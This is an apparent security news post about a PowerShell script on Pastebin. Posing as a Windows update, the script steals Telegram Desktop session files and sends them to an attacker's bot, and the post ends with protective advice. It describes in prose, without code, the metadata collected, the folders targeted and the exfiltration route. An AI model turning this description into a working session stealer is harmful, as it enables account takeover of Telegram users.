🎯Basically, hackers created a fake Windows update to steal your Telegram login info.
What Happened
Cybersecurity researchers have uncovered a malicious PowerShell script hosted on Pastebin, designed to steal Telegram session data from both desktop and web clients. Disguised as a routine Windows system update titled "Windows Telemetry Update," the script tricks unsuspecting users into executing it without suspicion.
How It Works
Once the script is run, it begins by collecting host metadata, including the victim's username, computer name, and public IP address. It then targets specific directories under %APPDATA% for Telegram Desktop, archiving session files into a compressed file named "diag.zip". This file is temporarily stored in the user's TEMP folder before being sent to the attacker's Telegram bot via the Telegram Bot API.
The script was identified as a high-severity threat during continuous monitoring of Pastebin for malicious content. Analysts noted that it operates without obfuscation or persistence mechanisms, indicating it may still be in a testing phase rather than fully deployed.
Who's Being Targeted
The primary targets are users of Telegram Desktop and Telegram Web. The script exploits the trust users have in routine updates, making it particularly dangerous as it can easily bypass user scrutiny.
Signs of Infection
If the script executes on a system, users may notice unusual behavior, such as unexpected notifications from their Telegram account or unauthorized messages being sent. The script's ability to terminate the Telegram process before stealing session data can also go unnoticed.
How to Protect Yourself
To safeguard against this threat:
Detection
- 1.Terminate all active Telegram sessions through the app settings.
- 2.Change your Telegram password and enable two-factor authentication.
- 3.Review your account for any unauthorized activity.
Removal
- 4.Block domains like api.telegram.org and web.telegram.org at the network level if Telegram is not permitted in your environment.
- 5.Monitor for unusual API calls from scripting environments such as PowerShell.
Conclusion
This incident highlights the ongoing risks associated with malware disguised as legitimate software updates. Users must remain vigilant and take proactive measures to protect their data from such threats.
🔒 Pro insight: The lack of obfuscation suggests this malware is still in validation, but its functionality indicates potential for future widespread attacks.
